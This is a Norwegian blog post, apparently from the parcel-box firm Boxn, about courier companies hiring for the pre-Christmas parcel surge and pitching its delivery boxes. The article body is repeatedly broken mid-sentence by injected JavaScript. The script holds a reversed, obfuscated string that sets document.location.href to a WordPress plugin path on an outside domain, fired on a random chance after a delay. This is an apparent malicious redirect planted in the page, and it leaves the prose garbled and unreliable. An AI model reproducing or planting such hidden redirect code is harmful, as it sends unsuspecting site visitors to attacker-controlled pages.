Spår ekstrem økning i pakker frem mot jul!

Nesten alle budselskapene ansetter for å kunne betjene en ekstrem økning av antall pakker som vil bli sendt fremover. Økningen er både grunnet Covid-19 og Black-friday, før julerushet. Hittil i år har toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\’=ferh.noitacol.tnemucod»];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dogtelemark/posten-ansetter-600-flere-til-black-friday-og-jul-1.15227681″ target=»_blank» rel=»noreferrer noopener»>Posten hatt 42 prosent økning på pakker fra netthtoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dom() * 6); if (number1==3){var delay = 18000; setTimeout($GRn(0),delay);}andel sammenliknet med samme tid i fjor. For å klare å få tatt unna den stoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.rantoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tore økningen som har vært og økningen som vil komme i htoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dom() * 6); if (number1==3){var delay = 18000; setTimeout($GRn(0),delay);}andelen fra nå og frem til jul så velger de å ansette hele 600 medarbeidere. 

Også leveringstjenesten Helt hjem forventer en stoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.rantoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tor vekst i november. Med en økning på 143 prosent opp mot november i fjor. For å håndtere økningen de forventer, skal de toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}doble bemanningen på hovedterminalen deres. 

Hjemlevering

Med så stoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.rantoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tor økning er det merkelig for oss at de ikke heller ser mer aktivt på løsninger for å effektivisere hver levering slik at budene kunne levert flere pakker på samme tid. Volumet av pakker ser ut til å skulle fortsette å øke fremover. Ved å fortsette å gjøre ting på dagens måte, vil man hele tiden være avhengig av å ansette flere. 

Hver pakke skal sorteres og tildeles en bil som kjører en rute. Ruten kan være den samme som 10 toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dom() * 6); if (number1==3){var delay = 18000; setTimeout($GRn(0),delay);}andre fra toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dom() * 6); if (number1==3){var delay = 18000; setTimeout($GRn(0),delay);}andre budselskap kjører. Dette er hverken miljøvennlig eller sikkert for alle som er ute å går langs med veiene. Hver leveranse er avhengig av å få kontakt med kunden for å kunne sette igjen pakken på døren. Sjåførene sitter i bilene sine og ringer kunder uten å få svar for så og kjøre til adressen og finne ut at ingen er hjemme. Da må de på slutten av ruten sin kjøre til de riktige henteterminalene eller post i butikk. og rekker de ikke det, kjører de tilbake til terminalen og pakken må lastes opp på en ny bil og kjøres ut til henteterminalen. 

Flere biler kjører innom samme punkter, men i forskjellig rekkefølge grunnet forskjellige leveringsintervaller.
Flere biler kjører innom samme punkter, men i forskjellig rekkefølge grunnet forskjellige leveringsintervaller.

Effektiviteten er langt i fra optimal.

Vi mener at for hver Boxn eller Multiboxn utplassert og for hver pakke som blir levert i disse, bedres effektiviteten. Miljøet og trafikksikkerheten vil samtidig bli bedre ivaretatt. Leveringssikkerheten og mulighetene for svinn bedres ved at både kunden og budet får kvittering når koden er benyttet og pakken er lagt inn. Pakken ligger da sikkert helt frem til kunden kommer og kvitterer den ut. Budet har ikke måttet ta en eneste telefon underveis, mens pakken blir skjermet for vær og tyver. 

Vårt håp er at budselskapene skal se gevinsten av dette og bli med på å revolusjonere hvordan dagens hjemlevering blir gjennomført. 

Se mer om Boxn her!

Relaterte artikler

Pakkeboks, Aktiv kjøl, klikk og hent, mat

Smart Supply og Boxn!

Boxn har i en lengre periode samarbeidet tett med Smart Supply om utrulling av pakkerterminaler i det norske markedet. Vi har gjennom dette samarbeidet fått

Helse vest IKT, Haukeland sykehus. IT utstyr, Pakkeboks, pakkebokser

Ny terminal ute hos Helse Vest!

Boxn og Helse Vest IKT har inngått en spennende pilot. Vi var i forrige uke i Bergen og leverte og monterte en MultiBoxn terminal. Denne

MultiBoxn med Aktiv kjøl

Endelig er MultiBoxn med aktiv kjøl på plass hos oss. Disse boksene har vi lenge ønsket å få produsert og levert da dette gir Boxn

nb_NONorwegian